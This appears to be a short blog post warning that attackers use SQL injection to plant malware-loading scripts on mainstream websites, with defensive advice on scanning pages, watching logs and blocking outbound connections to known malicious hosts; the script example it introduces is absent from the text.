A number of commentators, notably IBM’s Kris Lamb, have reported that malicious code is no longer limited, for the most part, to p0rn and other sleazy websites. Hackers are targeting the more commonly used education, healthcare, blogging and small ecommerce websites where they can come in and insert hostile code which will forward the user’s browser to download malware.
“We’ve reached a tipping point where every website should be viewed as suspicious and every user is at risk,” Lamb said in a statement. “The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity.”
The primary mode of attack appears to be SQL Injection, which still remains vulnerable because coding user input on a website correctly is technically challenging. So the bad guys hack in, drop a script such as :
And it runs every time someone visits the page, silently installing malware in the background.
If you run a query in Google, around 60,000 websites have this embedded in their page code. Needless to say, don’t visit any of them. I used Google to check the three websites I support via the “site:” search function. You can, too.
What to do? Use some freeware or shareware to do an initial scan for vulnerabilities. Scan your web pages for odd looking script sources. If you find them, you’ll know your web code is vulnerable somewhere. Set about finding where in a hurry, because the bad guy, or some other bad guy will find it again.
Next, take a look at anything else coming in through your firewall: FTP, email and terminal services/Citrix. Consider any opening a vector for attack, even if you have locked down the external IP
sources. Watch the logs carefully and daily.
Finally, watch outbound connections for known sites, such as the one above. Keep your ear out on security sites for the latest of those, and block connections to them from your firewall until they can be shut down.
More work, of course, but much LESS work than a successful attack!